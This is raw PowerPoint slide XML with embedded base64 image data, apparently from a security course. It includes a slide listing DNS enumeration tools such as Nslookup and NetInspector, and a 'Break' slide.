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3709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pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DNS Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2150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400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Locating information about DNS servers, DNS records, usernames, computer names, and IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Nslookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Digdug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>WhereIsIp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NetInspector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mice and Men Management Console</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4462645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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Break</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0QCEIQCEIQCEIQCEIQQqybjwVlWTceCiKSyN6PUmdCWJvRwCZ0KukcWjZ1Xl93AUqFKsmLCEIQCEIQCEIQCEIQCEIQCiylCD4Y8Gia6V7WWdU25c5nc+zcgvt2c0AbLbl5TaN0743QuhaWPiZA8XIL4Y75GOcDctGZ2wn/EVk0IKtZbZ/dWQhAIQhAIQoQShVDlhcS02oaUls9bAxzftNMjS8cWAkj2IM4hai3WxhZIH6Qi2+eP6lqzmG6R01VspqmGUgXIjkbIQPKAbhBkVWTceCsFWTceCiKSyN6OATOhLE3o4BM6FXSOLRs6qy+7gKVBUZlZMWshVui6CyFW6C5BZCgFCCUKuZF0FkKpcpBQShQVGZBZCrdTdBKEIQCEIQQtc0106p8Jh5Woddz7iGJts8rh4vEBsu47Bf1L7dKdI4sOpZKuc82JuwDfI87GMb5SdiUzSfSWbEql9VUOu555ovsjZ/hYwdDR/7PSgzmmGtatxIlrpTDCTshiJY2377vtPPHZ5AtLuhCAut+1G+G4PMm7Ny0Fb/qM8NweZN2bkDRBVk3HgrBVk3HgoiksjejgEzoSxN6OATOhV0ji0bOqsvu4eNZ92/wAx3uKSUlO3V/dv8x3uKSMqyYsXRdCLIC66j3PB+tX9Uk+Ji5cuodzx4Vf1ST4mIGRCCgIQcf7pDvOl6y7syl+zJgu6R7zpesu7MpfEGe0FP1pQ/wAQpej/AJzE4jQk70E8KUH8Qpe2YnECDHaSd51HVpuzckwJToaR951HVpuzckuKCQ5Nlqm8C0XoT8bkpgTZ6pvAtF6E/G5Bt6EIQCq5WVXIF87oPSszVbMOY76OlaJJR+tO8XF/NYR/OVyIlZPSjFDV1tRUk35aeSQH90uOX/tt7FjEFmt2+5d41dajYhE2pxVhfI8BzKe5a2NpGzlbbXO/d3DyrStR+i7a3EhJI3NHRM5dwIu0y3tED67u/wChM2AgwY0GoALfo+kta33EfvyrwoNXlDT1LaunpWRSszWdGXMFnDKQWXy7j4lsqEEBVk3HgrKsm48FEUlkb0cAmdCWJvRwCZ0KukcWjZ1Vl93Dyq/u3+Y73FJGU7lX92/zHe4pIyrJi0JgdUurygrcKiqKqkZJI58rXPJeCQ2RzRucBsACX5NFqNd9SQekn8v+a5BkPmhwr/gI/wCaT86yGB6BUNBLy1JSsikLSwuBeTkO0jnOPiCz+ZSCgAhSoQcg7pHvOl6y7syl8TB90j3nS9Zd2ZS+IM9oJ4UoOv0vbMTiBJrohVNhxCkmlcGsirKeSRx3NY2VjnONugAEpmxrawv8Qi9j/wAqDPaR951PVpuzckvKabHNaeGSUs8bK+IufBK1os/a5zCAPs+MpWiEEBNnqm8C0XoT8bkpibPVN4FovQn43INvQhCAXxYy8tp5nDe2GQjiGEhfavixphdTzAbzBIBxLDZAlRQgoUjv/c3UgFJVTW2vqGRk+MMZmA9sp9q7GuRdzhNehqWdLasO/mjYP/ErrqgCEIQQqybjwVlWTceCiKSyN6OATOhLE3o4BM6FXSOLRs6qy+7h5Vf3b/Md7ikjKdyr+7f5jvcUkZVkxaFbMqqbIC6ZvUH4Hb1ib3hLImb1B+B29Ym94QdHQUIKDj/dI950vWXdmUviYPuke86XrLuzKX1BIKi6LIsgLouiyEAmz1TeBaL0J+NyUxNnqm8C0XoT8bkG3oQhAKrxfYenfwVlDkCW6QYaaWqnpiCOQmki277NcQD7LH1r4F0/X3o0afERVtb9HWsDr22CZlmvbxtkPrK5gg6x3PWkAhrpaR5sKyMFnlmizED1tdJ7AmJukmoK58ErJonFskTw+Nw3te03BHrTPavNalPicbWSPbFVAASROOUSHpdET9oH9XeP6oN8Qq5l5vq2tcGF7Q598jSQHOttNmnadiD1VZNx4KwVZNx4KIpLI3o4BM6EsTejgEzoVdI4tGzqrL7uHlV/dv8AMd7ikjKdyr+7f5jvcUkZVkxaEwOqXV5QVuFRVFVSMkkc+VrnkvBIbI5o3OA2ABL8mi1Gu+pIPST+X/NcgyHzRYV+Hx/zSfnWwYHgMFDFyFLEIow4uDQSRmdvPOJKyGZQXILIUAoQcg7pHvOl6y7syl8TB90j3nS9Zd2ZS+IM9oKAcToQemvpfX9MxOA2Bv6o9gSf6CeFKD+IUvbMTiBBi9I4R8jqOaO9pugfs3JMynQ0j7zqOrTdm5JcUAE2eqbwLRehPxuSmBNnqm8C0XoT8bkG3oQhAIKEINX1h6HtxWifTEhsg+kp3HcyYA2v+6blp8jkp2IYe+nlfDMwskicWSNcLFrhvBCdhc+1m6qo8Wby0JEVUxtmvtzZgNzJbf0d0eUIFfCnMslj2js9BKYauF0TxuDhscPGx25w8oWMQZJmk1U0ZW1dQABawmkAtwzLb9ScpfjkLnkuJZNcuOYn6N28neufLftRnhuDzJuzcgaMKsm48FYKsm48FEUlkb0cAmdCWJvRwCZ0KukcWjZ1Vl93Dyq/u3+Y73FJGU7lX927zHe4pJCrJi1VbMoQgLrqPc8H61f1ST4mLl1l1DuePCr+qSfExAyIQgIKDkHdI950vWXdmUviYPuke86XrLuzKX2yDO6CeFKDr9L2zE4gSd6CD60oOv0vbMTiBBjtI+86nq03ZuSXlOhpH3nUdWm7NyS8oAJs9U3gWi9CfjclMATZ6pvAtF6E/G5Bt6EBCAQhCAUKVCD48SwiKqZyVTCyVh2lsjQ8X8YB3Hadu9aNiOofDJiSyOWEn9lIbNPkD8wXRUIOUs7nOguCaiqI6RmiF/ZGtp0Z1XUGGyCanhPKtuGyPe57gCLG22w2HxLbUKABVl3HgrXVZNx4IFkb0cAmdCWFvRwCZ4KukcWjaVVl93Cr2Aix3EWPA71qXzS4V+Hxe1/5